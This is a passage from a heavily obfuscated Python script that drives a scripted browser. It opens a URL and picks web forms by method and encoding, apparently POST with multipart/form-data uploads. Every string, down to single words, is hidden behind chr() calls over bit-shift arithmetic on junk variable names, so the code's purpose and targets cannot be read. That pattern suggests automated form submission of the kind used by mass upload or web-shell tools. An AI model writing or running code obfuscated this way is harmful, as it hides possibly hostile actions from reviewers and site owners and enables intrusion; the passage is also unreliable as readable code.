clcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf)])))]
br.open(________________________czrkpslclact, timeout =(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf))
if(str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in _________________________xopyuxqnuyqk):
try :
br.select_form( method =str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])), enctype =str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
except :
br.select_form( method =str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])), enctype =str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
elif (str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])) in _________________________xopyuxqnuyqk):
br.select_form( method =str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])), enctype =str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))])))
elif (str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_h